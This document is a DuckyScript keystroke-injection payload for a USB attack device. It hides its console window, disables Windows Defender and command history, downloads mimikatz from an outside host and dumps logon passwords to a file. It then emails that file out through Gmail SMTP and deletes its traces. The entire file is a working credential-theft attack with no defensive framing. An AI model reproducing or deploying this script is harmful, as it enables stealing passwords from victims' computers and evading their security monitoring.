upload_inject_older_10

REM Author: WizhardHacker1
REM Date: 2/1/2020
REM -------------open command prompt with admin privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 100
STRING Set-PSReadlineOption -HistorySaveStyle SaveNothing
ENTER
DELAY 5000
REM -------------download appropriate mimikatz for architecture
STRING if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url.com/32bit_mimikatz/mimikatz.exe','c:\windows\temp\pw.exe');  }else{ (new-object System.Net.WebClient).DownloadFile('http://url.com/64bit_mimikatz/mimikatz.exe','C:\Windows\Temp\pw.exe');}
ENTER
DELAY 5000
STRING start-process cmd.exe -Verb runAs
ENTER
DELAY 3000
REM -------------get the passwords and save to c:\pwlog.txt
STRING C:\Windows\Temp\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
DELAY 2000
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
ENTER
DELAY 1000
STRING exit
ENTER
STRING exit
ENTER
DELAY 300
STRING del C:\Windows\Temp\pw.exe
ENTER
DELAY 300
REM -------------email log via gmail
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 300
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@gmail.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'user@gmail.com'
ENTER
STRING $ReportEmail.To.Add('user@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'MimiKatZ Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your MiMiKatZ report.' 
ENTER
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 4000
STRING exit
ENTER
REM ---------------------delete and end
STRING del c:\pwlog.txt
ENTER
DELAY 300
STRING exit
ENTER
STRING exit
ENTER
STRING exit
ENTER
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
STRING Clear-History
ENTER
STRING exit
ENTER